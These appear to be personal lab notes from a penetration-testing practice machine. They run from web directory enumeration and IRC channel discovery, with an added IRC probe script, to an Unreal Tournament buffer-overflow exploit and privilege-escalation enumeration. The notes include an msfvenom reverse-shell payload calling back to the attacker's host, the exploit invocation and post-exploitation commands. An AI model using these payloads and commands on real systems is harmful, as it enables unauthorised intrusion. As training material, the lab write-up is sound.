/Themes (Status: 301)
/Themes.php (Status: 200)
/readme (Status: 200)
/robots.txt (Status: 200)
/setup (Status: 301)
/sql (Status: 301)
/sql.php (Status: 200)
/LICENSE (Status: 200)
/LICENSE.php (Status: 200)
/%20 (Status: 403)
/Libraries (Status: 301)
/INDEX.php (Status: 200)
/License (Status: 200)
/License.php (Status: 200)
/SQL (Status: 301)
/SQL.php (Status: 200)
/locale (Status: 301)
/*checkout* (Status: 403)
/*checkout*.php (Status: 403)
/*checkout*.html (Status: 403)
/*checkout*.txt (Status: 403)
/import.php (Status: 200)
/Navigation.php (Status: 200)
/CHANGELOG (Status: 200)
/CHANGELOG.php (Status: 200)
/Changelog (Status: 200)
/Changelog.php (Status: 200)
/Doc (Status: 301)
/JS (Status: 301)
/dco (Status: 200)
/URL.php (Status: 302)
/Examples (Status: 301)
/Setup (Status: 301)
/*docroot* (Status: 403)
/*docroot*.php (Status: 403)
/*docroot*.html (Status: 403)
/*docroot*.txt (Status: 403)
/* (Status: 403)
/*.html (Status: 403)
/*.txt (Status: 403)
/*.php (Status: 403)
/con (Status: 403)
/con.php (Status: 403)
/con.html (Status: 403)
/con.txt (Status: 403)
/Robots.txt (Status: 200)
/ReadMe (Status: 200)
/Locale (Status: 301)
/DOC (Status: 301)
/Readme (Status: 200)
/**http%3a (Status: 403)
/**http%3a.php (Status: 403)
/**http%3a.html (Status: 403)
/**http%3a.txt (Status: 403)
/*http%3A (Status: 403)
/*http%3A.php (Status: 403)
/*http%3A.html (Status: 403)
/*http%3A.txt (Status: 403)
/aux (Status: 403)
/aux.php (Status: 403)
/aux.html (Status: 403)
/aux.txt (Status: 403)
/**http%3A (Status: 403)
/**http%3A.php (Status: 403)
/**http%3A.html (Status: 403)
/**http%3A.txt (Status: 403)
/server_status.php (Status: 200)
/DB_Search.php (Status: 200)
/phpinfo.php (Status: 200)
...

FTP: failed to connect as anonymous (MadCowz FTP)

// BurpSuite request to login on @ http://192.168.236.44/public_html/admin.php (but don’t know how to bruteforce with Hydra)

POST /public_html/admin.php HTTP/1.1
Host: 192.168.236.44
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.236.44/public_html/admin.php
Content-Type: multipart/form-data; boundary=---------------------------17914201875003999151636418193
Content-Length: 291
Connection: close
Cookie: CMSSESSID=vveo6lp591nen3gg8pgqu0lsk0; cpg_data=YToxOntzOjI6IklEIjtzOjI2OiJ2dmVvNmxwNTkxbmVuM2dnOHBncXUwbHNrMCI7fQ%3D%3D
Upgrade-Insecure-Requests: 1

-----------------------------17914201875003999151636418193
Content-Disposition: form-data; name="alogin"

admin
-----------------------------17914201875003999151636418193
Content-Disposition: form-data; name="pwd"

admin
-----------------------------17914201875003999151636418193--

// Install hexchat to connect to IRC server


$ sudo apt-get install hexchat
$ hexchat

// Click “+Add” to add a new server -> Create “UT99”

// Click “Edit” to update this server


// Modify as follows:
● Server: 192.168.68.44/6789
● Untick “Use global user information”
● Nick name, User name, Password: fluffy
● Close to go back

// Then “Connect” to UT99 server -> “OK”


==========================
* Welcome to MadCowz!
* Welcome to the MadCowz IRC Network fluffy!fluffy@192.168.49.68
* Your host is irc.madcowz.localdomain, running version 2.0
* This server was created 10:20:51 May 10 2015
* irc.madcowz.localdomain 2.0 iosw biklmnopstv bklov
* AWAYLEN=200 CASEMAPPING=rfc1459 CHANMODES=b,k,l,imnpst
CHANNELLEN=64 CHANTYPES=# CHARSET=ascii ELIST=MU FNC KICKLEN=255
MAP MAXBANS=60 MAXCHANNELS=20 MAXPARA=32 :are supported by this server
* MAXTARGETS=20 MODES=20 NETWORK=MadCowz NICKLEN=31 PREFIX=(ov)@+
STATUSMSG=@+ TOPICLEN=307 VBANLIST WALLCHOPS WALLVOICES :are
supported by this server
* 909AAACD2 :your unique ID
* irc.madcowz.localdomain message of the day
* - Mad Cowz, y0!
* End of message of the day.
* There are 2 users and 0 invisible on 1 servers
* 1 :channels formed
* I have 2 clients and 0 servers
* Current Local Users: 2 Max: 4
* Current Global Users: 2 Max: 4
==========================
// Click "Server" -> Select "Channel List"

-> The list comes back empty because HexChat's channel list only shows channels with at least 5 users by default, and the welcome text above says this server has at most 4 users (Max: 4). Lower the minimum user count to 1.
-> Click "Search" to list the channels.
-> There is one channel, #ut99. Join it: click "Server" -> "Join a channel", enter "ut99" -> OK

// Two users are present: daisy and our own nick, fluffy

-> Important message, the channel topic:

Topic for #ut99 is: Fragging since UT99! Unreal Tournament 99 Game Server UP! IP: *THIS* Port: 7778
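The same discovery can be done without a GUI client, which is handy when you want to repeat it from a jump host. The script below is an added example, not part of the original notes: it registers with PASS/NICK/USER (the HexChat "Password" field above is exactly the PASS command), answers PING, sends LIST (which, unlike HexChat's channel-list dialog, has no minimum-user filter), joins every channel returned and records each topic. Host, port and credentials are the ones used with HexChat above; the parser is a pure state machine so it can be exercised on captured server lines without a live connection.

```python
import socket


def parse_irc(line):
    """Split one IRC line into (prefix, [command, param, ..., trailing]); the trailing param keeps its spaces."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    params = head.split()
    if sep:
        params.append(trailing)
    return prefix, params


class IrcChannelProbe:
    """Registers, asks the server for every channel, joins each one and records its topic.
    Feed server lines in with handle_line(); it returns the commands to send back."""

    def __init__(self, nick, password=None):
        self.nick, self.password = nick, password
        self.channels = {}          # channel -> user count, from RPL_LIST (322)
        self.topics = {}            # channel -> topic, from RPL_TOPIC (332)
        self._names_done = set()    # channels whose RPL_ENDOFNAMES (366) has arrived
        self.done = False

    def hello(self):
        """Registration burst. PASS must be sent before NICK/USER."""
        cmds = [f"PASS {self.password}"] if self.password else []
        return cmds + [f"NICK {self.nick}", f"USER {self.nick} 0 * :{self.nick}"]

    def handle_line(self, line):
        _, p = parse_irc(line)
        if not p:
            return []
        cmd = p[0]
        if cmd == "PING":                       # keepalive; unanswered PINGs get the client dropped
            return [f"PONG :{p[1]}" if len(p) > 1 else "PONG"]
        if cmd == "001":                        # RPL_WELCOME: registered, request the channel list
            return ["LIST"]
        if cmd == "322" and len(p) >= 4:        # RPL_LIST: <me> <channel> <users> :<topic>
            self.channels[p[2]] = int(p[3]) if p[3].isdigit() else 0
            return []
        if cmd == "323":                        # RPL_LISTEND: join everything we saw
            if not self.channels:
                self.done = True
            return [f"JOIN {c}" for c in self.channels]
        if cmd == "332" and len(p) >= 4:        # RPL_TOPIC
            self.topics[p[2]] = p[3]
        elif cmd == "366" and len(p) >= 3:      # RPL_ENDOFNAMES: the join completed
            self._names_done.add(p[2])
            self.done = self._names_done >= set(self.channels)
        return []


def probe_irc(host, port, nick, password=None, timeout=20):
    """Drive IrcChannelProbe over a real socket; returns the probe with channels/topics filled in."""
    probe = IrcChannelProbe(nick, password)
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall("".join(c + "\r\n" for c in probe.hello()).encode())
        buf = b""
        while not probe.done:
            chunk = s.recv(4096)
            if not chunk:
                break
            buf += chunk
            while b"\n" in buf:
                raw, buf = buf.split(b"\n", 1)
                for reply in probe.handle_line(raw.decode("utf-8", "replace")):
                    s.sendall((reply + "\r\n").encode())
        s.sendall(b"QUIT :done\r\n")
    return probe


if __name__ == "__main__":
    p = probe_irc("192.168.68.44", 6789, "fluffy", "fluffy")   # values from the HexChat steps above
    for chan, users in p.channels.items():
        print(chan, users, p.topics.get(chan, ""))
```

Channels that are secret (+s) do not show up in LIST, so an empty result is not proof that nothing exists; the WHOIS output for the other connected user is the next thing to look at in that case.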
// searchsploit Unreal Tournament (the Metasploit module failed)

Unreal Tournament - Remote Buffer Overflow (SEH) | windows/remote/16145.pl

● Bad characters: 0x00 0x5c
● Maximum shellcode size: 938 bytes

// No need to regenerate the payload, just provide the correct arguments
$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.68 LPORT=443 EXITFUNC=thread -f perl -b "\x00\x5c"

$ perl 16145.pl 192.168.68.44 7778 192.168.49.68 4445

// get the reverse shell

Local.txt: 649befdd7800f4cc1660d10615d795ca
C:\UnrealTournament\System>systeminfo
systeminfo

Host Name: FLUFFY-PC


OS Name: Microsoft® Windows Vista™ Business
OS Version: 6.0.6002 Service Pack 2 Build 6002
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: fluffy
Registered Organization:
Product ID: 89584-OEM-7332141-00029
Original Install Date: 10/1/2015, 5:09:16 AM
System Boot Time: 12/3/2020, 12:01:38 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~3094 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT-08:00) Pacific Time (US & Canada)
Total Physical Memory: 1,023 MB
Available Physical Memory: 510 MB
Page File: Max Size: 2,309 MB
Page File: Available: 1,146 MB
Page File: In Use: 1,163 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\FLUFFY-PC
Hotfix(s): 7 Hotfix(s) Installed.
[01]: KB2305420
[02]: KB2999226
[03]: KB935509
[04]: KB937287
[05]: KB938371
[06]: KB955430
[07]: KB968930
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 192.168.193.44

$ ./windows-exploit-suggester.py --database 2020-11-18-mssb.xls --systeminfo ~/OffSec/Practice/UT99/systeminfo
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 7 hotfix(es) against the 469 potential bulletins(s) with a database of 137
known exploits
[*] there are now 468 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows Vista SP2 64-bit'
[*]
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*] https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k
Denial of Service (MS16-135)
[*] https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys'
'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*] https://github.com/tinysec/public/tree/master/CVE-2016-7255
[*]
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[*] https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ
Integer Overflow (MS16-098)
[*]
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[*] https://github.com/foxglovesec/RottenPotato
[*] https://github.com/Kevin-Robertson/Tater
[*] https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local
WebDAV NTLM Reflection Elevation of Privilege
[*] https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege
Escalation
[*]
[E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
[*] https://www.exploit-db.com/exploits/39990/ -- Windows - gdi32.dll Multiple DIB-Related
EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-
074), PoC
[*] https://www.exploit-db.com/exploits/39991/ -- Windows Kernel - ATMFD.DLL
NamedEscape 0x250C Pool Corruption (MS16-074), PoC
[*]
[E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical
[*] https://www.exploit-db.com/exploits/39994/ -- Internet Explorer 11 - Garbage Collector
Attribute Type Confusion (MS16-063), PoC
[*]
[E] MS16-059: Security Update for Windows Media Center (3150220) - Important
[*] https://www.exploit-db.com/exploits/39805/ -- Microsoft Windows Media Center - .MCL
File Processing Remote Code Execution (MS16-059), PoC
[*]
[E] MS16-056: Security Update for Windows Journal (3156761) - Critical
[*] https://www.exploit-db.com/exploits/40881/ -- Microsoft Internet Explorer - jscript9
JavaScriptStackWalker Memory Corruption (MS15-056)
[*] http://blog.skylined.nl/20161206001.html -- MSIE jscript9 JavaScriptStackWalker
memory corruption
[*]
[E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile
(3143141) - Important
[*] https://www.exploit-db.com/exploits/40107/ -- MS16-032 Secondary Logon Handle
Privilege Escalation, MSF
[*] https://www.exploit-db.com/exploits/39574/ -- Microsoft Windows 8.1/10 - Secondary
Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032), PoC
[*] https://www.exploit-db.com/exploits/39719/ -- Microsoft Windows 7-10 & Server 2008-
2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell), PoC
[*] https://www.exploit-db.com/exploits/39809/ -- Microsoft Windows 7-10 & Server 2008-
2012 (x32/x64) - Local Privilege Escalation (MS16-032) (C#)
[*]
[M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) -
Important
[*] https://www.exploit-db.com/exploits/40085/ -- MS16-016 mrxdav.sys WebDav Local
Privilege Escalation, MSF
[*] https://www.exploit-db.com/exploits/39788/ -- Microsoft Windows 7 - WebDAV
Privilege Escalation Exploit (MS16-016) (2), PoC
[*] https://www.exploit-db.com/exploits/39432/ -- Microsoft Windows 7 SP1 x86 -
WebDAV Privilege Escalation (MS16-016) (1), PoC
[*]
[E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution
(3134228) - Important
[*] Windows 7 SP1 x86 - Privilege Escalation (MS16-014),
https://www.exploit-db.com/exploits/40039/, PoC
[*]
[E] MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution
(3124901) - Important
[*] https://www.exploit-db.com/exploits/39232/ -- Microsoft Windows devenum.dll!
DeviceMoniker::Load() - Heap Corruption Buffer Underflow (MS16-007), PoC
[*] https://www.exploit-db.com/exploits/39233/ -- Microsoft Office / COM Object DLL
Planting with WMALFXGFXDSP.dll (MS-16-007), PoC
[*]
[E] MS15-134: Security Update for Windows Media Center to Address Remote Code
Execution (3108669) - Important
[*] https://www.exploit-db.com/exploits/38911/ -- Microsoft Windows Media Center Library
Parsing RCE Vulnerability aka self-executing' MCL File, PoC
[*] https://www.exploit-db.com/exploits/38912/ -- Microsoft Windows Media Center Link
File Incorrectly Resolved Reference, PoC
[*] https://www.exploit-db.com/exploits/38918/ -- Microsoft Office / COM Object - 'els.dll'
DLL Planting (MS15-134)
[*] https://code.google.com/p/google-security-research/issues/detail?id=514 -- Microsoft
Office / COM Object DLL Planting with els.dll
[*]
[E] MS15-132: Security Update for Microsoft Windows to Address Remote Code Execution
(3116162) - Important
[*] https://www.exploit-db.com/exploits/38968/ -- Microsoft Office / COM Object DLL
Planting with comsvcs.dll Delay Load of mqrt.dll (MS15-132), PoC
[*] https://www.exploit-db.com/exploits/38918/ -- Microsoft Office / COM Object els.dll
DLL Planting (MS15-134), PoC
[*]
[E] MS15-112: Cumulative Security Update for Internet Explorer (3104517) - Critical
[*] https://www.exploit-db.com/exploits/39698/ -- Internet Explorer 9/10/11 -
CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112)
[*]
[E] MS15-111: Security Update for Windows Kernel to Address Elevation of Privilege
(3096447) - Important
[*] https://www.exploit-db.com/exploits/38474/ -- Windows 10 Sandboxed Mount Reparse
Point Creation Mitigation Bypass (MS15-111), PoC
[*]
[E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of
Privilege (3089657) - Important
[*] https://www.exploit-db.com/exploits/38202/ -- Windows CreateObjectTask
SettingsSyncDiagnostics Privilege Escalation, PoC
[*] https://www.exploit-db.com/exploits/38200/ -- Windows Task Scheduler
DeleteExpiredTaskAfter File Deletion Privilege Escalation, PoC
[*] https://www.exploit-db.com/exploits/38201/ -- Windows CreateObjectTask
TileUserBroker Privilege Escalation, PoC
[*]
[M] MS15-100: Vulnerability in Windows Media Center Could Allow Remote Code
Execution (3087918) - Important
[*] https://www.exploit-db.com/exploits/38195/ -- MS15-100 Microsoft Windows Media
Center MCL Vulnerability, MSF
[*] https://www.exploit-db.com/exploits/38151/ -- Windows Media Center - Command
Execution (MS15-100), PoC
[*]
[E] MS15-097: Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code
Execution (3089656) - Critical
[*] https://www.exploit-db.com/exploits/38198/ -- Windows 10 Build 10130 - User Mode
Font Driver Thread Permissions Privilege Escalation, PoC
[*] https://www.exploit-db.com/exploits/38199/ -- Windows
NtUserGetClipboardAccessToken Token Leak, PoC
[*]
[M] MS15-078: Vulnerability in Microsoft Font Driver Could Allow Remote Code Execution
(3079904) - Critical
[*] https://www.exploit-db.com/exploits/38222/ -- MS15-078 Microsoft Windows Font
Driver Buffer Overflow
[*]
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of
Privilege (3057191) - Important
[*] https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege
Vulnerability, PoC
[*] https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k
Exploit, MSF
[*]
[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code
Execution (3036220) - Critical
[*] https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows 8.1 - win32k Local
Privilege Escalation (MS15-010), PoC
[*] https://www.exploit-db.com/exploits/37098/ -- Microsoft Windows - Local Privilege
Escalation (MS15-010), PoC
[*] https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows win32k Local
Privilege Escalation (MS15-010), PoC
[*]
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) -
Critical
[*] http://www.exploit-db.com/exploits/35474/ -- Windows Kerberos - Elevation of Privilege
(MS14-068), PoC
[*]
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution
(3011443) - Critical
[*] https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML
Application) - Remote Code Execution (MS14-064), PoC
[*] http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 -
Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC
[*] http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation
Array Remote Code Execution (#1), PoC
[*] http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation
Array Remote Code Execution (MSF), MSF
[*] http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE
Package Manager Code Execution Through Python, MSF
[*] http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE
Package Manager Code Execution, MSF
[*]
[M] MS14-060: Vulnerability in Windows OLE Could Allow Remote Code Execution
(3000869) - Important
[*] http://www.exploit-db.com/exploits/35055/ -- Windows OLE - Remote Code Execution
'Sandworm' Exploit (MS14-060), PoC
[*] http://www.exploit-db.com/exploits/35020/ -- MS14-060 Microsoft Windows OLE
Package Manager Code Execution, MSF
[*]
[M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution
(3000061) - Critical
[*] http://www.exploit-db.com/exploits/35101/ -- Windows TrackPopupMenu Win32k NULL
Pointer Dereference, MSF
[*]
[E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of
Privilege (2975684) - Important
[*] https://www.exploit-db.com/exploits/39525/ -- Microsoft Windows 7 x64 - afd.sys
Privilege Escalation (MS14-040), PoC
[*] https://www.exploit-db.com/exploits/39446/ -- Microsoft Windows - afd.sys Dangling
Pointer Privilege Escalation (MS14-040), PoC
[*]
[E] MS14-035: Cumulative Security Update for Internet Explorer (2969262) - Critical
[E] MS14-029: Security Update for Internet Explorer (2962482) - Critical
[*] http://www.exploit-db.com/exploits/34458/
[*]
[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege
(2958732) - Important
[*] http://www.exploit-db.com/exploits/35280/, -- .NET Remoting Services Remote
Command Execution, PoC
[*]
[M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical
[M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege
(2916607) - Important
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of
Privilege (2880430) - Important
[M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical
[M] MS13-096: Vulnerability in Microsoft Graphics Component Could Allow Remote Code
Execution (2908005) - Critical
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
[M] MS13-071: Vulnerability in Windows Theme File Could Allow Remote Code Execution
(2864063) - Important
[M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical
[M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical
[M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical
[M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code
Execution (2850851) - Critical
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of
Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID
Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID
Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
(2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of
Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution
(2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of
Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
(981852) - Important
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
(977165) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[M] MS09-065: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code
Execution (969947) - Critical
[M] MS09-053: Vulnerabilities in FTP Service for Internet Information Services Could Allow
Remote Code Execution (975254) - Important
[M] MS09-050: Vulnerabilities in SMBv2 Could Allow Remote Code Execution (975517) -
Critical
[*] https://www.rapid7.com/db/modules/exploit/windows/smb/ms09_050_smb2_negotiate_func_index -- MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
[*]
[*] done
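Most of that output is noise for someone who already holds a low-privileged shell: the Internet Explorer, Office and Media Center bulletins need a victim to open something, and several of the listed PoCs were written for Windows 7, 8.1 or 10 rather than Vista. The triage script below is an added example (not the suggester's own code): it parses the tool's text, keeps only bulletins that offer a local privilege escalation, sets aside PoCs whose title names another Windows build, and marks which ones have a Metasploit module. The keyword lists are heuristics, the sample is a constructed excerpt of the output above, and every hit still has to be checked by hand against the 7 installed hotfixes.

```python
import re

# Constructed sample: a handful of entries copied from the suggester output above (same format, not a full run)
SUGGESTER_SAMPLE = """\
[+] windows version identified as 'Windows Vista SP2 64-bit'
[*]
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*] https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*] https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*] https://github.com/tinysec/public/tree/master/CVE-2016-7255
[*]
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[*] https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
[*]
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[*] https://github.com/foxglovesec/RottenPotato
[*] https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation
[*]
[E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical
[*] https://www.exploit-db.com/exploits/39994/ -- Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063), PoC
"""

BULLETIN_RE = re.compile(r"^\[([EM])\] (MS\d{2}-\d{3}): (.+?) - (Critical|Important|Moderate|Low)$")
POC_RE = re.compile(r"^\[\*\] (\S+)(?: -- (.+))?$")
OS_RE = re.compile(r"^\[\+\] windows version identified as '([^']+)'")
EOP_WORDS = ("Elevation of Privilege", "Privilege Escalation", "Kernel-Mode Driver")
CLIENT_SIDE_WORDS = ("Internet Explorer", "Office", "Media Center", "Windows Journal", "ActiveX")
OS_WORDS = ("Windows 10", "Windows 8.1", "Windows 8", "Windows 7", "Vista", "Server 2012", "Server 2008")


def triage(text, target_os=None):
    """Keep only bulletins that give a shell-holder a local privilege-escalation path.
    Returns [{"id", "title", "msf", "usable": [refs], "other_os": [refs]}] in the tool's order."""
    bulletins, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = OS_RE.match(line)
        if m and target_os is None:             # take the target build from the tool's own detection
            target_os = next((w for w in OS_WORDS if w in m.group(1)), None)
            continue
        m = BULLETIN_RE.match(line)
        if m:
            flag, ms, title, _severity = m.groups()
            cur = {"id": ms, "title": title, "msf": flag == "M", "usable": [], "other_os": []}
            bulletins.append(cur)
            continue
        m = POC_RE.match(line)
        if m and cur:
            ref, title = m.group(1), m.group(2) or ""
            if "Denial of Service" in title:    # a crash is not an escalation
                continue
            named = [w for w in OS_WORDS if w in title]
            if named and target_os not in named:    # PoC written for a different Windows build
                cur["other_os"].append(ref)
            elif any(w in title for w in EOP_WORDS):
                cur["usable"].append(ref)
    keep = []
    for b in bulletins:
        title_is_eop = any(w in b["title"] for w in EOP_WORDS) and not any(w in b["title"] for w in CLIENT_SIDE_WORDS)
        if title_is_eop or b["usable"] or b["other_os"]:
            keep.append(b)
    return keep


if __name__ == "__main__":
    for b in triage(SUGGESTER_SAMPLE):
        print(b["id"], "MSF" if b["msf"] else "PoC", "usable:", b["usable"], "other OS:", b["other_os"])
```

Feed it the full saved output (`triage(open("suggester.txt").read())`) and work the "usable" column first; an entry in "other_os" is worth a look only if the vulnerable component also shipped in the target's build.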

C:\UnrealTournament\System>whoami /all
whoami /all

USER INFORMATION
----------------

User Name       SID
=============== ==============================================
fluffy-pc\daisy S-1-5-21-2166732910-1323509646-2289275227-1001

GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes
==================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by
default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by
default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group,
Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group,
Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group,
Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by
default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory
group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Unknown SID type S-1-16-8192 Mandatory
group, Enabled by default, Enabled group

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled

C:\UnrealTournament\System>net user
net user

User accounts for \\FLUFFY-PC

-------------------------------------------------------------------------------
Administrator daisy fluffy
Guest kermit
The command completed successfully.

C:\UnrealTournament\System>net localgroup Administrators

-> fluffy belongs to the Administrators group -> should we get a shell as this user???

// Found this exploit: https://www.exploit-db.com/exploits/40485 (Foxit Cloud Update Service - Unquoted Service Path Privilege Escalation)

// Auto-start services outside C:\Windows whose image path is not quoted
C:\UnrealTournament\System>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
Foxit Cloud Safe Update Service  FoxitCloudUpdateService  C:\Program Files (x86)\Foxit Software\Foxit Reader\Foxit Cloud\FCUpdateService.exe  Auto

// sc qc takes the service name, not the display name
C:\UnrealTournament\System>sc qc "Foxit Cloud Safe Update Service"
sc qc "Foxit Cloud Safe Update Service"
[SC] OpenService FAILED 1060:

The specified service does not exist as an installed service.

C:\UnrealTournament\System>sc qc FoxitCloudUpdateService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: FoxitCloudUpdateService
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Foxit Software\Foxit Reader\Foxit Cloud\FCUpdateService.exe
LOAD_ORDER_GROUP :
TAG :0
DISPLAY_NAME : Foxit Cloud Safe Update Service
DEPENDENCIES :
